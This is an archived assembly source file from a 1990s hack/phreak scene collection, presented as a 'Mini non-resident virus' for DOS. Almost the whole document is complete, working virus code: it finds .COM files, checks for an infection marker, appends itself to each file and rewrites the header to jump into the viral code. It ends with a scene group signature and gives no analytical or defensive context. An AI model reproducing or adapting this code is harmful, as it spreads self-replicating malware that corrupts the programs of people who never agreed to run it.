home *** CD-ROM | disk | FTP | other *** search
/ Collection of Hack-Phreak Scene Programs / cleanhpvac.zip / cleanhpvac / M.ZIP / MINI98.ZIP / MINI98.ASM next >
Assembly Source File  |  1993-12-24  |  3KB  |  105 lines
  1. ;****************************************************************************
  2. ;*              Mini non-resident virus
  3. ;****************************************************************************
  4.  
  5. cseg            segment
  6.                 assume  cs:cseg,ds:cseg,es:cseg,ss:cseg
  7.  
  8.                 .RADIX  16
  9.  
  10. FILELEN         equ     end - start
  11. FILNAM          equ     5C
  12.  
  13.  
  14. ;****************************************************************************
  15. ;*              Dummy program (infected)
  16. ;****************************************************************************
  17.  
  18.                 org     100h
  19.  
  20. begin:          db      4Dh
  21.                 db      0E9, 4, 0
  22.  
  23.  
  24. ;****************************************************************************
  25. ;*              Begin of the virus
  26. ;****************************************************************************
  27.  
  28.  
  29. start:          db      0CDh,  20h, 0, 0
  30.  
  31.                 push    si                      ;si=0100
  32.  
  33.                 mov     di,si
  34.                 add     si,[si+2]               ;si=0104
  35.                 push    si
  36.                 movsw
  37.                 movsw
  38.                 pop     si                      ;si -> start (buffer)
  39.  
  40.                 lea     dx,[si+FILNAM]          ;dx -> filename
  41.                 mov     ah,4Eh                  ;find first file
  42. infloop:        int     21
  43.                 jc      return
  44.  
  45.                 mov     dx,009Eh
  46.                 mov     ax,3D02h                ;open the file
  47.                 call    int21
  48.                 jc      exit1
  49.                 xchg    bx,ax
  50.  
  51.                 mov     ah,3fh                  ;read begin of file
  52.                 int     21
  53.  
  54.                 cmp     byte ptr [si],4Dh       ;EXE or infected COM?
  55.                 je      exit2
  56.  
  57.                 mov     al,2                    ;go to end of file
  58.                 call    seek
  59.                 xchg    ax,di
  60.  
  61.                 mov     cl,low FILELEN          ;write program to end of file
  62.                 mov     ah,40h
  63.                 int     21
  64.  
  65.                 mov     al,0
  66.                 call    seek
  67.                 mov     word ptr [si],0E94Dh
  68.                 mov     word ptr [si+2],di
  69.  
  70.  
  71.                 mov     ah,40h
  72.                 int     21
  73.  
  74. exit2:          mov     ah,3Eh                  ;close the file
  75.                 int     21
  76.  
  77. exit1:          mov     ah,4Fh                  ;find next file
  78.                 jmp     short infloop
  79.  
  80. seek:           mov     ah,42
  81.                 cwd
  82. int21:          xor     cx,cx
  83.                 int     21
  84.                 mov     cl,04
  85.                 mov     dx,si
  86.  
  87. return:         ret
  88.  
  89.  
  90. ;****************************************************************************
  91. ;*              Data
  92. ;****************************************************************************
  93.  
  94. filename        db      '*.COM',0
  95.  
  96. end:
  97.  
  98. cseg            ends
  99.                 end     begin
  100. 
  101. ;  ─────────────────────────────────────────────────────────────────────────
  102. ;  ───────────────> ReMeMbEr WhErE YoU sAw ThIs pHile fIrSt <───────────────
  103. ;  ───────────> ArReStEd DeVeLoPmEnT +31.77.SeCrEt H/p/A/v/AV/? <───────────
  104. ;  ─────────────────────────────────────────────────────────────────────────
  105.